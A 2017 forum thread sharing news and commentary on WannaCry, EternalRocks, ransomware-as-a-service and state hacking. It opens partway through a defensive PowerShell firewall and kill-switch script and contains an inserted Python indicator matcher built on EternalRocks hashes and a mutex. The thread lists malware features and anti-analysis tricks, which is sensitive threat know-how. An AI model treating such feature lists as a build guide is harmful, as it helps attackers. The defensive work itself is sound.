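# Step 3: host-firewall block for the ports the guidance lists [UDP 137, 138 and
# TCP 139, 445], as defence in depth beside the block on network devices.
# Caveat: inbound TCP/445 is also legitimate file sharing, so this suits workstations;
# a file server needs the patch or a narrower rule instead.
$ruleName = 'NCSC WannaCry containment: block inbound SMBv1/NetBIOS'
if (-not (Get-NetFirewallRule -DisplayName "$ruleName*" -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName "$ruleName (TCP)" -Direction Inbound `
        -Protocol TCP -LocalPort 139, 445 -Action Block | Out-Null
    New-NetFirewallRule -DisplayName "$ruleName (UDP)" -Direction Inbound `
        -Protocol UDP -LocalPort 137, 138 -Action Block | Out-Null
    'Inbound SMB/NetBIOS block rules added'
}

# Step 4: the kill-switch domain. The guidance says a host must be able to resolve and
# connect to it at the point of compromise, and that it must NOT be blocked, so this
# checks reachability instead of filtering it.
$killSwitch = 'www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com'
try {
    $records = Resolve-DnsName -Name $killSwitch -Type A -ErrorAction Stop
    "Kill-switch domain resolves to: $($records.IPAddress -join ', ')"
    $probe = Test-NetConnection -ComputerName $killSwitch -Port 80 -WarningAction SilentlyContinue
    if ($probe.TcpTestSucceeded) {
        'Kill-switch domain reachable on TCP/80: the sinkhole check can work from here'
    } else {
        'Kill-switch domain resolves but TCP/80 is blocked: check proxy and egress filtering'
    }
} catch {
    "Kill-switch domain does not resolve from this host: $($_.Exception.Message)"
}
```

The firewall step is deliberately idempotent (it skips creation when a rule with the same display-name prefix exists) so the script can be pushed repeatedly through management tooling without stacking duplicate rules.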

OUTLAW 09
05-14-2017, 02:27 PM
Hackers are selling fake diplomas and certifications in the dark web
According to Israeli threat intelligence firm Sixgill, certifications and fake diplomas are very cheap and easy to buy in the dark web. It is quite easy to buy in dark web marketplaces any kind of illegal product and service, including fake certifications...

OUTLAW 09
05-14-2017, 02:33 PM
Karmen Ransomware, a cheap RaaS service that implements anti-analysis features

Security experts from threat intelligence firm Recorded Future have spotted a new ransomware-as-a-service (RaaS) offering called Karmen. The service allows customers to easily create their ransomware campaign in a few steps and without specific skills.
Wannabe crooks also track infected systems via a “Clients” tab; the dashboard implements an efficient and easy-to-use cockpit that includes information such as the number of infected machines, earned revenue, and available updates for the malware.
The Karmen RaaS is very cheap: it costs just $175, and buyers can decide the ransom price and the duration of the period in which the victims can pay the ransom.
The Karmen ransomware is based on the open-source ransomware Hidden Tear, which was released in August 2015 by the Turkish security researcher Utku Sen for educational purposes.
The first Karmen infections were reported in December 2016; the malware infected machines in Germany and the United States.
The Karmen ransomware is a multi-threaded and multi-language ransomware that supports .NET 4.0 and uses the AES-256 encryption standard.
The malware is .NET dependent and requires PHP 5.6 and MySQL.
“On March 4, 2017, a member of a top-tier cyber criminal community with the username ‘Dereck1’ mentioned a new ransomware variant called ‘Karmen,’” reported a blog post published by Recorded Future.
“Further investigation revealed that ‘DevBitox,’ a Russian-speaking cyber criminal, was the seller behind the Karmen malware on underground forums in March 2017.”
“However, the first cases of infections with Karmen were reported as early as December 2016 by victims in Germany and the United States.”
Once it has infected a machine, the ransomware displays a ransom note with payment instructions; unlike similar malware, Karmen automatically deletes the decryptor when it detects a sandbox environment or any other analysis software.
“A notable feature of Karmen is that it automatically deletes its own decryptor if a sandbox environment or analysis software is detected on the victim’s computer.” continues the blog post.
Below is the list of ransomware features provided by DevBitox:
Multi-threaded
Multi-language
Supports .NET 4.0 and newer versions
Encryption algorithm: AES-256
Adaptive admin panel
Encrypts all discs and files
Separate BTC wallet for each victim
Small size
Automatic deletion of loader
Automatic deletion of malware (after payment was received)
Minimal connection with control server
Robust control panel
Almost FUD (1/35)
Automatic file decryption after received payment
T2W compatible
File extensions remain the same
Detection of anti-debugger/analyzers/VM/sandbox
Automatic deletion of decryptor if sandbox environment is detected on victim’s computer
Light version: obfuscation and autoloader only
Full version: detection of analyzing software
The ransomware is available for sale in both light and full versions; the light version doesn’t include anti-analysis features.

OUTLAW 09
05-14-2017, 02:40 PM
Global ‘Wana’ Ransomware Outbreak Earned Perpetrators $26,000 So Far

OUTLAW 09
05-14-2017, 04:06 PM
Wcry ransomware is reborn without its killswitch, starts spreading anew



Yesterday, the world got a temporary respite from the virulent Wcry ransomware worm, which used a leaked NSA cyberweapon to spread itself to computers all over the world, shutting down hospitals, financial institutions, power companies, businesses, and private individuals' computers, demanding $300 to reactivate them.

The respite was thanks to a sloppy bit of programming from the worm's creator, who'd left a killswitch in the code: newly infected systems checked to see if a certain domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com) existed before attempting to spread the infection; by registering this domain, security researchers were able to freeze the worm.

But a day later, it's back, and this time, without the killswitch. Security researchers running honeypots have seen new infections by versions of the worm that can spread even when the iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com domain is live.

"I can confirm we've had versions without the kill switch domain connect since yesterday," Costin Raiu, director of the global research and analysis team at Kaspersky Lab, told Motherboard on Saturday.

OUTLAW 09
05-15-2017, 04:40 AM
Microsoft officially confirms @NSAGov developed the flaw that brought down hospitals this weekend.
https://blogs.microsoft.com/on-the-issues/2017/05/14/need-urgent-collective-action-keep-people-safe-online-lessons-last-weeks-cyberattack/

OUTLAW 09
05-15-2017, 08:37 AM
Troy Hunt: Everything you need to know about the WannaCry / Wcry / WannaCrypt ransomware
https://www.troyhunt.com/everything-you-need-to-know-about-the-wannacrypt-ransomware/

OUTLAW 09
05-15-2017, 04:06 PM
Ransomware hits small number of U.S. critical infrastructure operators: official
http://reut.rs/2pNAgIR

OUTLAW 09
05-15-2017, 07:26 PM
Patriarch of Russian Orthodox church making sure that the Ministry of Internal Affairs computers won't get affected by WannaCry virus attack

davidbfpo
05-15-2017, 10:41 PM
The National Cyber Security Centre, the NCSC (UK and part of GCHQ), has published technical guidance, which includes specific software patches to use that will prevent uninfected computers on your network from becoming infected with the “WannaCry” Ransomware: https://www.ncsc.gov.uk/guidance/ransomware-latest-ncsc-guidance

For additional in-depth technical guidance on how to protect your organisation from ransomware, details can be found here: https://www.ncsc.gov.uk/guidance/protecting-your-organisation-ransomware

The Soufan Group's commentary: http://www.soufangroup.com/tsg-intelbrief-the-global-ransomware-attack/

OUTLAW 09
05-16-2017, 07:29 AM
Massive cryptocurrency botnet used leaked NSA exploits weeks before WCry
https://arstechnica.com/?post_type=post&p=1098281

The three bitcoin wallets tied to #WannaCry ransomware have received 216 payments totaling 34.6200695 BTC ($58,821.36 USD).

OUTLAW 09
05-16-2017, 01:06 PM
@DAlperovitch on lessons learned from the #WannaCry cyberattacks:
http://www.atlanticcouncil.org/blogs/new-atlanticist/a-simple-security-update-can-save-your-data

OUTLAW 09
05-17-2017, 09:54 AM
Hackers mint crypto-currency with technique in global 'ransomware' attack
http://reut.rs/2pTagMh

OUTLAW 09
05-17-2017, 10:25 AM
The Electronic signature technology provider DocuSign suffered a data breach
Hackers broke into the system of the technology provider DocuSign and accessed customers' email. The experts warn of possible spear phishing attacks. The electronic signature technology provider DocuSign suffered a data breach; hackers have stolen emails.


Shadow Brokers are back after the WannaCry case; they plan to offer data dumps on a monthly subscription model

Shadow Brokers made the headlines once again: the notorious group plans to offer data dumps on a monthly subscription model. The notorious Shadow Brokers hacking group made the headlines during the weekend when systems worldwide were compromised by the WannaCry ransomware... which they had released as part of their NSA data dump.....

OUTLAW 09
05-17-2017, 10:26 AM
Some machines can’t be infected by WannaCry because they have been already infected by Adylkuzz

Security experts at Proofpoint discovered that many machines can't be infected by WannaCry because they have already been infected by Adylkuzz.

OUTLAW 09
05-17-2017, 10:27 AM
APT32, a new APT group allegedly linked to the Vietnamese Government, is targeting foreign corporations

APT32 is a new APT group discovered by security experts at FireEye that is targeting Vietnamese interests around the globe. The APT32 group, also known as OceanLotus Group, has been active since at least 2013; according to the experts, it is a state-sponsored hacking and cybercrime group........

OUTLAW 09
05-17-2017, 10:29 AM
WikiLeaks Reveals two distinct malware platforms codenamed AfterMidnight and Assassin used by the CIA operators to target Windows systems.

While critical infrastructure worldwide and private organizations were ridiculed by the WannaCry attack, WikiLeaks released a new batch of CIA documents from the Vault 7 leaks.

The new dump included the documentation related to two CIA frameworks used to create custom malware for the Microsoft Windows platform.
The two frameworks are codenamed AfterMidnight and Assassin; both implement classic backdoor features that allow the CIA to take control of the targeted systems.

OUTLAW 09
05-18-2017, 08:20 AM
EU fines Facebook 110 million euros over misleading WhatsApp data
http://reut.rs/2pWdMWj

OUTLAW 09
05-18-2017, 02:49 PM
When ransomware guys provide better customer support than most companies #WannaCry

OUTLAW 09
05-19-2017, 02:31 PM
French security researchers say they have found a method to decrypt Windows files locked by WannaCry ransomware.

OUTLAW 09
05-20-2017, 12:01 PM
UIWIX, the Fileless Ransomware that leverages NSA EternalBlue Exploit to spread

Experts discovered a new ransomware family, dubbed UIWIX, that uses the NSA-linked EternalBlue exploit for distribution. The effects of the militarization of cyberspace are dangerous and unpredictable. A malicious code developed by a government...


WikiLeaks revealed CIA Athena Spyware, the malware that targets all Windows versions

Wikileaks released the documentation for the Athena spyware, a malware that could infect and remotely control almost any Windows machine. Last Friday, Wikileaks released the documentation for the AfterMidnight and Assassin malware platforms

OUTLAW 09
05-20-2017, 12:03 PM
HTTPS phishing sites are increasing; it is the reaction to browser improvements

The number of HTTPS phishing sites continues to increase; it is the response of phishers to the improvements implemented by browser makers. If you believe that HTTPS could protect you from phishing attacks, you are wrong; in 2014 TrendMicro warned of the increase in this ability.....

OUTLAW 09
05-20-2017, 12:05 PM
Cisco starts assessing its products against the WannaCry vulnerability

The tech giant Cisco announced an investigation into the potential impact of the WannaCry malware on its products. The recent massive WannaCry ransomware attack highlighted the importance of patch management for any organization and Internet user.

OUTLAW 09
05-20-2017, 12:06 PM
Microsoft Patch Tuesday updates for May 2017 fix Zero Days exploited by Russian APT groups

Microsoft Patch Tuesday for May 2017 addresses tens of security vulnerabilities, including a number of zero-day flaws exploited by Russian APT groups. Microsoft Patch Tuesday updates for May 2017 fix more than 50 security flaws, including a number of zero-day...

OUTLAW 09
05-21-2017, 09:17 AM
Exclusive: North Korea's Unit 180, the cyber warfare cell that worries the West
http://www.reuters.com/article/us-cyber-northkorea-exclusive-idUSKCN18H020

OUTLAW 09
05-21-2017, 01:13 PM
Buckle-up for another cyber ride
https://www.wired.com/2017/03/wikileaks-cia-hacks-dump/

Another data dump of CIA hacked tools... by the Russian intel org Wikileaks...

OUTLAW 09
05-21-2017, 01:17 PM
Security experts at threat intelligence firm Recorded Future have found a clear link between the APT3 cyber threat group and China’s Ministry of State Security.


The curtain has been pulled back a little on the Chinese Intelligence Agency intelligence gathering structure — and it includes private security contractors and the network vendor supply chain.

In 2010, security vendor FireEye identified the Pirpi Remote Access Trojan (RAT) which exploited a then 0-day vulnerability in Internet Explorer versions 6, 7 and 8. FireEye named the threat group APT3 which has also been described as TG-0100, Buckeye, Gothic Panda, and UPS and described them as “one of the most sophisticated threat groups” being tracked at the time.

Since then, APT3 has been actively penetrating corporations and governments in the US, UK and most recently Hong Kong — and everyone has been trying to figure out who they are. APT3 functions very differently than 3LA, the former Chinese military hacking organization, leading to the assumption that APT3 is not part of the military complex. At least not officially.

On May 9th, 2017, an unknown party using the alias ‘intrusiontruth’ published a series of blog posts describing connections between the Pirpi RAT command and control components and shareholders of the Chinese security contractor Guangzhou Boyu Information Technology Company, aka Boyusec.

“On May 9, a mysterious group calling itself “intrusiontruth” identified a contractor for the Chinese Ministry of State Security (MSS) as the group behind the APT3 cyber intrusions.” states the analysis published by Recorded Future.

The names of two specific shareholders of Boyusec appear in the domain registration for the Pirpi C&C servers. This is particularly interesting because Boyusec supports the Chinese Ministry of State Security (MSS) by collecting civilian human intelligence. Think of them as an outsourcer for a government agency like the United States’ National Security Agency (NSA).

Also interesting is that in 2016 a Pentagon report described the relationship between Boyusec and network equipment manufacturer, Huawei. According to the report, the two companies were colluding to develop security equipment with embedded backdoors which would likely be used by Boyusec to compromise Huawei customers.

“In November 2016, the Washington Free Beacon reported that a Pentagon internal intelligence report had exposed a product that Boyusec and Huawei were jointly producing.” continues the analysis. “According to the Pentagon’s report, the two companies were working together to produce security products, likely containing a backdoor, that would allow Chinese intelligence “to capture data and control computer and telecommunications equipment.” The article quotes government officials and analysts stating that Boyusec and the MSS are “closely connected,” and that Boyusec appears to be a cover company for the MSS.”

To protect our networks, it is important to assess the threats. An important part of threat assessment is to anticipate the motivation of the attackers. APT3 has demonstrated above average skills and has been active for a long time. Add ties to the network vendor supply chain and you have the makings of a dangerous adversary. As part of the Chinese MSS structure you can start to guess at motivation. With this new information, it is a good time to reassess your threat model.

OUTLAW 09
05-21-2017, 01:27 PM
Europol supported the Slovak NAKA crime unit in an operation that resulted in the seizure of the Bloomsfield darknet marketplace.

Another success for the European police: last week Europol supported the Slovak NAKA crime unit in the arrest of a Slovak national believed to operate the Bloomsfield darknet marketplace dealing in drugs and arms.

“Bloomsfield started its marketplace around two years ago, but remained throughout its shelf life a rather small market with few listings and users.” reported website darkweb.world.

The police took into custody the suspect and several of his premises have been searched.

“Europol has supported the Slovak authorities in their investigation into a Slovak national who had been trading firearms, ammunition, and drugs on the Darknet.” reads the statement published by the Europol.

“In one of the locations searched, Slovak authorities discovered and seized five firearms and approximately 600 rounds of ammunition of different calibers. The investigators also found a sophisticated indoor cannabis plantation, 58 cannabis plants and a Bitcoin wallet containing bitcoins worth EUR 203 000, which is thought to have been obtained from illegal online activities.”

The law enforcement has seized the server running the darknet marketplace, experts are analyzing it searching for evidence and other information useful for the investigation.

“The server used by the suspect to host the Darknet marketplace was also seized during the raids and is currently being forensically analysed. Slovak authorities and Europol have extended the investigation into the users and vendors who utilised the marketplace.” states Europol

Bloomsfield was launched around two years ago but is considered a very small market with few listings and users. It started as the vendor shop of the vendor ‘Biocanna’ and later other vendors joined the darknet market.
Biocanna has shared a portion of a conversation on Twitter concerning the ‘owner of the failing Bloomsfield market.’

Best I've ever seen pic.twitter.com/yKxkNvQ43G
— C (@2ctfm) May 4, 2017

If the above claims are correct, Europol will have no difficulty tracking the other operators of the black market.

“Europol supported Slovakia throughout the entire investigation by providing its analytical and financial intelligence capabilities.” reads the Europol’s announcement. “Also, a cross-check performed during the house searches generated a hit on Europol’s databases which helped investigators identify a Darknet vendor living in another EU country. The individual was suspected of supplying one of the firearms found during the house searches in Bratislava.”
Darknet marketplaces are important facilitators of criminal activities; the monitoring of this ecosystem is crucial for law enforcement.

OUTLAW 09
05-21-2017, 01:31 PM
The Stegano exploit kit, also known as Astrum, continues to evolve, recently its authors adopted the Diffie-Hellman algorithm to hinder analysis.

The Stegano exploit kit was associated in the past with a massive AdGholas malvertising campaign that delivered malware, mostly the Gozi and RAMNIT trojans. Experts at TrendMicro also observed the exploit kit in the Seamless malvertising campaign.

“Astrum’s recent activities feature several upgrades and show how it’s starting to move away from the more established malware mentioned above.
It appears these changes were done to lay the groundwork for future campaigns, and possibly to broaden its use.

With a modus operandi that deters analysis and forensics by abusing the Diffie-Hellman key exchange, it appears Astrum is throwing down the gauntlet.” reads the analysis published by Trend Micro.

In March, the French researcher Kafeine reported the Stegano EK exploiting the information disclosure vulnerability tracked as CVE-2017-0022. Hackers exploited the flaw to evade antivirus detection and analysis.

A month later, the Stegano exploit kit was updated to prevent security researchers from replaying the malicious network traffic.

“We found that this anti-replay feature was designed to abuse the Diffie-Hellman key exchange—a widely used algorithm for encrypting and securing network protocols. Angler was first observed doing this back in 2015.” continues the analysis.

“Implementing the Diffie-Hellman key exchange prevents malware analysts and security researchers from getting a hold of the secret key Astrum uses to encrypt and decrypt their payloads. Consequently, obtaining the original payload by solely capturing its network traffic can be very difficult.”

According to the experts, the Astrum/Stegano exploit kit includes exploit code for a number of vulnerabilities in Adobe Flash, including the CVE-2015-8651 RCE, the CVE-2016-1019 RCE, and the out-of-bounds read flaw tracked as CVE-2016-4117.

Experts highlighted that currently the Stegano exploit kit isn’t used to deliver malware and associated traffic is very low; both circumstances suggest we can soon observe a spike in its activity.

“It wouldn’t be a surprise if [Astrum/Stegano’s] operators turn it into an exclusive tool of the trade—like Magnitude and Neutrino did—or go beyond leveraging security flaws in Adobe Flash. Emulating capabilities from its predecessors such as fileless infections that can fingerprint its targets and deliver encrypted payloads shouldn’t be far off,” concluded Trend Micro.

OUTLAW 09
05-21-2017, 02:27 PM
Hacking #IoT Devices: The Alarming Internet of Things #CyberSecurity MT @ipfconline1

OUTLAW 09
05-22-2017, 12:03 PM
http://www.reuters.com/article/us-russia-cyber-banks-idUSKBN18I0VE?feedType=RSS&feedName=topNews&utm_source=twitter&utm_medium=Social

Technology News | Mon May 22, 2017 | 5:00am EDT

Exclusive: Hackers hit Russian bank customers, planned international cyber raids



Russian cyber criminals used malware planted on Android mobile devices to steal from domestic bank customers and were planning to target European lenders before their arrest, investigators and sources with knowledge of the case told Reuters.
Their campaign raised a relatively small sum by cyber-crime standards - more than 50 million roubles ($892,000) - but they had also obtained more sophisticated malicious software for a modest monthly fee to go after the clients of banks in France and possibly a range of other western nations.

"Cron's success was due to two main factors," Volkov said. "First, the large-scale use of partner programs to distribute the malware in different ways. Second, the automation of many (mobile) functions which allowed them to carry out the thefts without direct involvement."

OUTLAW 09
05-22-2017, 12:33 PM
Patriarch of Russian Orthodox church making sure that the Ministry of Internal Affairs computers won't get affected by WannaCry virus attack

Russia suffered the highest number of registered WannaCry attacks globally and now suddenly they did not.....

Deputy secretary for Russia's National Security Council says WannaCry ransomware caused minimal damage in Russia.

That is not the story carried by their state media in the first days of the attack....

Over 100K computers got hit.... as Russia runs largely on illegal MS XP copies...... and illegal copies of MS Server 2003....

flagg
05-23-2017, 12:17 PM
Russia suffered the highest number of registered WannaCry attacks globally and now suddenly they did not.....

Deputy secretary for Russia's National Security Council says WannaCry ransomware caused minimal damage in Russia.

That is not the story carried by their state media in the first days of the attack....

Over 100K computers got hit.... as Russia runs largely on illegal MS XP copies...... and illegal copies of MS Server 2003....

Average Russian OS's are XP and MS Server 03?

That's crazy.

I think I also read that Russian banks only invest a fraction of that spent by major US/Western banks on IT/Cyber security.

Is the Russian banking sector seriously vulnerable to a non attributable proxy attack campaign?

OUTLAW 09
05-23-2017, 02:55 PM
Average Russian OS's are XP and MS Server 03?

That's crazy.

I think I also read that Russian banks only invest a fraction of that spent by major US/Western banks on IT/Cyber security.

Is the Russian banking sector seriously vulnerable to a non attributable proxy attack campaign?

The answer to the question is... yes, they are. For example, Morgan Stanley invested over 600M USD in IT security in 2016 for their global network........

The entire Russian banking system: 25M USD.....

BTW...a lot of MS W7 was hit inside Russia......

OUTLAW 09
05-23-2017, 03:31 PM
A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.


The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.
Stampar discovered EternalRocks after it infected his SMB honeypot; he called the malware ‘DoomsDayWorm.’

Stampar discovered that EternalRocks disguises itself as WannaCry, but instead of delivering ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.

Unlike the WannaCry ransomware, which leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks uses seven exploits leaked by the Shadow Brokers, and its code doesn’t include a kill-switch.

EternalRocks was developed to avoid detection and to remain undetected on the target system; it uses the following NSA exploits:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan

EternalRocks downloads all the above SMB exploits to the infected computer, then it scans the internet for open SMB ports on other systems to compromise.


Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on
https://github.com/stamparm/EternalRocks/
…. Will keep it updated, along with @_jsoo_

Update on #EternalRocks. Original name is actually "MicroBotMassiveNet" while author's nick is "tmc" https://github.com/stamparm/EternalRocks/#debug-strings …

If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95

P.S. there is no kill-switch. Everything goes through Tor. Initial infection by MS17-010 drops Tor binaries for further communication

Somebody actually used complete Shadowbrokers dump (SMB part) and made a worm out of it. Uses WannaCry names (taskhost/svchost) to distract

Seems to be just spreading at the moment and getting further commands from C&C

Whole EternalRocks campaign (first and second stage malware) uses Mutex: {8F6F00C4-B901-45fd-08CF-72FDEFF}

OUTLAW 09
05-23-2017, 03:42 PM
URGENTLY IMPORTANT

It is just a matter of time until the common malware-through-phishing bad guys incorporate SMB exploits for a synergistic attack.

Then, we all die.........

OUTLAW 09
05-24-2017, 08:12 AM
WARNING to US Military and SWJ commenters and readers.....

Kremlin troll @Noclador was right @hardhouz13

OUTLAW 09
05-26-2017, 08:06 AM
Recent on BRZbank hack. Bank hasn't owned up. Incl US accts. Never "exploited [on] such a big scale." Hacked 10/22/16 https://www.wired.com/2017/04/hackers-hijacked-banks-entire-online-operation/ …

OUTLAW 09
06-03-2017, 08:33 AM
The economic impact of cybercrime will reach $8 Trillion by 2022

According to a report published by Juniper Research, the economic impact of cybercrime is expected to reach an $8 trillion price tag over the next five years. According to a report published by Juniper Research, the number of data records that will be compromised...

We are only 5 years away from achieving this......

OUTLAW 09
06-03-2017, 08:35 AM
Vault7: CIA Pandemic implant turns file servers into malware infectors

Wikileaks released a new lot of documents belonging to the Vault7 dump that details the CIA project codenamed 'Pandemic implant'. Wikileaks released a new batch of documents belonging to the Vault7 archive related to the CIA project codenamed 'Pandemic.'

https://twitter.com/wikileaks/status/870332839270780928

davidbfpo
06-12-2017, 08:58 AM
There are a number of posts here and on other threads which: a) have quoted text in excess of the 'Fair Use' principle, which opinion suggests 400-600 words can be cited; b) lack any citation to their origin / source.

The Forum relies on the guidance from Stanford University Libraries via:http://fairuse.stanford.edu/

It refers to 'Fair Use' as:
The less you take, the more likely that your copying will be excused as a fair use. Within: http://fairuse.stanford.edu/overview/fair-use/four-factors/

SWJ has had encounters with copyright before and it is an area we wish to steer clear of - for very simple reasons.

If the recent posts can have attribution they will have to be deleted, please update them or send them via a PM with the Post Number to me.

Updated 16th June 2017: ten posts deleted which lack any cited source after no response from author.

OUTLAW 09
06-12-2017, 01:25 PM
A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.



Miroslav Stampar @stamparm
Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)

Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on
https://github.com/stamparm/EternalRocks/
…. Will keep it updated, along with @_jsoo_

Update on #EternalRocks. Original name is actually "MicroBotMassiveNet" while author's nick is "tmc" https://github.com/stamparm/EternalRocks/#debug-strings …

If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95

P.S. there is no kill-switch. Everything goes through Tor. Initial infection by MS17-010 drops Tor binaries for further communication

Somebody actually used complete Shadowbrokers dump (SMB part) and made a worm out of it. Uses WannaCry names (taskhost/svchost) to distract

Seems to be just spreading at the moment and getting further commands from C&C

Whole EternalRocks campaign (first and second stage malware) uses Mutex: {8F6F00C4-B901-45fd-08CF-72FDEFF}

http://securityaffairs.co/wordpress/
Who then rewrote the researchers published in public domain notes....
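The tweets quoted above give three MD5 hashes, a campaign mutex and the decoy process names the worm reuses. As an added example (not the researcher's code and not from the original post), the following Python script turns those indicators into a small detection check and runs it over constructed log lines. The `key=value` log layout, the legitimate-path rule for `taskhost.exe`/`svchost.exe` and the sample events are all assumptions made for the example; only the hash and mutex values come from the post.

```python
"""Indicator matcher for the EternalRocks IoCs quoted in the post above.

The hashes and mutex are the ones published in the quoted tweets. The
'key=value key="quoted value"' log format and the sample events below
are constructed for this example (assumption, not a real EDR export).
"""
import re

# Indicators quoted in the post above.
ETERNALROCKS_MD5 = {
    "406ac1595991ea7ca97bc908a6538131",
    "5c9f450f2488140c21b6a0bd37db6a40",
    "c52f20a854efb013a0a1248fd84aaa95",
}
ETERNALROCKS_MUTEX = "{8F6F00C4-B901-45fd-08CF-72FDEFF}"

# Process names the post says the worm borrows to blend in. Genuine copies
# live in the Windows system directories, so a copy elsewhere is suspect.
# (Path rule is an assumption for this example.)
DECOY_NAMES = {"taskhost.exe", "svchost.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Matches key=value pairs where the value is either quoted or whitespace-free.
LINE_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line):
    """Parse one constructed log line into a dict of fields."""
    return {k: v.strip('"') for k, v in LINE_RE.findall(line)}


def match_indicators(line):
    """Return the list of reasons this line matches an indicator (empty if none)."""
    ev = parse_line(line)
    hits = []

    # 1. File hash match against the published MD5s.
    md5 = ev.get("md5", "").lower()
    if md5 in ETERNALROCKS_MD5:
        hits.append(f"known EternalRocks hash {md5}")

    # 2. Creation of the campaign mutex.
    if ev.get("event") == "mutex" and ev.get("name") == ETERNALROCKS_MUTEX:
        hits.append("EternalRocks campaign mutex created")

    # 3. Decoy system process name running from a non-system path.
    image = ev.get("image", "").lower()
    name = image.rsplit("\\", 1)[-1]
    if name in DECOY_NAMES and not image.startswith(SYSTEM_DIRS):
        hits.append(f"{name} running outside the system directory: {image}")

    return hits


def scan(lines):
    """Return (line_index, hits) for every line that triggers at least one rule."""
    results = []
    for i, line in enumerate(lines):
        hits = match_indicators(line)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample events: one benign process, one decoy binary with a
# published hash, the campaign mutex, and an unrelated download.
SAMPLE_LOG = [
    r'event=process image="C:\Windows\System32\svchost.exe" md5=0123456789abcdef0123456789abcdef',
    r'event=process image="C:\ProgramData\taskhost.exe" md5=406ac1595991ea7ca97bc908a6538131',
    r'event=mutex name={8F6F00C4-B901-45fd-08CF-72FDEFF} pid=1234',
    r'event=process image="C:\Users\alice\Downloads\installer.exe" md5=d41d8cd98f00b204e9800998ecf8427e',
]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG):
        print(f"line {idx}: " + "; ".join(hits))
```

The hash rule is the weakest of the three (any recompiled copy changes it); the mutex and the out-of-place system process name are the checks that survive trivial repacking, which is why the script reports every rule that fires rather than stopping at the first.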

OUTLAW 09
06-12-2017, 01:27 PM
At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.


http://securityaffairs.co/wordpress/
Who then rewrote the researchers published in public domain notes....

OUTLAW 09
06-12-2017, 01:32 PM
Experts killed tens of thousands of subdomains used by crooks to host the RIG Exploit Kit that were set up with a domain shadowing campaign.



http://securityaffairs.co/wordpress/

Who then rewrote the researchers published in public domain notes....

OUTLAW 09
06-16-2017, 08:25 AM
It's just getting a bit worse every day... New @wikileaks documents reveal how the CIA is hacking into your router
https://www.wired.com/story/wikileaks-cia-router-hack/

BTW...routers were never ever that secure......to begin with...

OUTLAW 09
06-18-2017, 11:58 AM
Ether Thief Remains Mystery Year After $55 Million Digital Heist
https://www.bloomberg.com/features/2017-the-ether-thief/

Well worth reading as a number of malware and or other exploits result actually from poorly written code....and or IEEE issues not recognized by computer engineers...

OUTLAW 09
06-18-2017, 03:00 PM
US-CERT @USCERT_gov 13 June

TA17-164A: HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
http://bit.ly/2sxPRAT

OUTLAW 09
06-18-2017, 03:02 PM
The 3 Biggest Lies About the Internet of Things https://safeandsavvy.f-secure.com/2017/06/12/the-3-biggest-lies-about-the-internet-of-things/

flagg
06-18-2017, 08:01 PM
The 3 Biggest Lies About the Internet of Things https://safeandsavvy.f-secure.com/2017/06/12/the-3-biggest-lies-about-the-internet-of-things/

Talking to a couple of cyber security SMEs recently, it would appear one of the biggest threats is high volume, low cost IoT devices like IP security cameras that have very short product development and sales life cycles (measured in months rather than years).

Lots of persistent vulnerabilities in cheap IoT hardware's firmware that can result in very large and easy to build attack arrays.

Moore's Law combined with commercial market forces means that this environment of large volume vulnerabilities occurring with each cheap IoT device generation is unlikely to be mitigated without intervention.

I would suspect that some form of intervention will be required, possibly along the lines of public/private partnership such as certification.

CE or UL are symbols used to identify compliant appliances for categories like electrical/fire safety.

I suspect we will need some form of IoT device compliance through certification or litigation.

Or in emergencies, the ability to remotely identify, locate, and negate them.

Ralph Nader's "Unsafe at Any Speed", but instead of targeting the Corvair and the greater car industry in terms of safety standards and features, for the IoT age.

This is not an original thought as I found it elsewhere first, but there's also the potential for some jurisdictions to "conscript" devices.

We have moved beyond conscripting humans to work on behalf of sovereign government in most instances, but our devices being conscripted is an entirely different story and not beyond the realm of believability to preempt a crisis and enhance national resilience.

OUTLAW 09
06-19-2017, 06:29 AM
Cited in part:
Talking to a couple of cyber security SMEs recently, it would appear one of the biggest threats is high volume, low cost IoT devices like IP security cameras that have very short product development and sales life cycles (measured in months rather than years).

This IMHO is one of the most serious points of internet security that urgently needs an answer as it is virtually impossible to constantly update all the various built-in firmware issues for literally thousands of IoTs...down to your for IoT enabled refrigerator.....or TV or baby monitoring device....

OUTLAW 09
06-20-2017, 06:46 AM
South Korean hosting co. pays $1m ransom to end eight-day outage
Criminals were talked down from 4.4M USDs...


https://www.theregister.co.uk/2017/06/20/south_korean_webhost_nayana_pays_ransom/

OUTLAW 09
06-21-2017, 10:14 AM
Honda halts Japan car plant after WannaCry virus hits computer network
http://reut.rs/2sU6jvK

flagg
06-22-2017, 09:08 AM
Nuclear war fears had a public component of "duck and cover".

Cyber war fears should have a public component of "patch and update".

